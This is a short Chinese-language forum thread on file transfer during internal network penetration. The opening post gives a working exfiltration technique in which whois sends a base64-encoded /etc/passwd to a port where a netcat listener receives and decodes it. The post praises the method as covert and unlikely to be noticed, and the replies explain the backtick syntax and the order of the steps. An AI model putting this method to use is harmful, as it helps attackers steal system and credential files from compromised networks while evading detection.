内网渗透中的文件传输
利用whois传输文件: 传输机: root@john:~# whois -h 127.0.0.1 -p 4444 `cat /etc/passwd | base64`接受机: root@john:/tmp# nc -l -v -p 4444 | sed "s/ //g" | base64 -d
优点:适用于隐蔽传输。最小化被发现。缺点:适用于传输小文件。
`cat /etc/passwd | base64` 这个前面的单引号是什么作用
这个是不是要先nc监听4444才能在传输机上操作whois命令 本帖最后由 ayx 于 2019-4-4 09:42 编辑
ayx 发表于 2019-4-4 08:55
`cat /etc/passwd | base64` 这个前面的单引号是什么作用
这个是不是要先nc监听4444才能在传输机上操作wh ...
自己搜索了下 已了解 单引号是bash语法中的特殊符号,优先运行反引内的命令
whois -h 127.0.0.1 -p 4444 `cat /etc/passwd | base64`
等价于 cat /etc/passwd | base64 | whois -h 127.0.0.1 -p 4444 ayx 发表于 2019-4-4 09:28
自己搜索了下 已了解 单引号是bash语法中的特殊符号,优先运行反引内的命令
whois -h 127.0.0.1 -p 4444 ...
嗯嗯,感谢填坑!
页:
[1]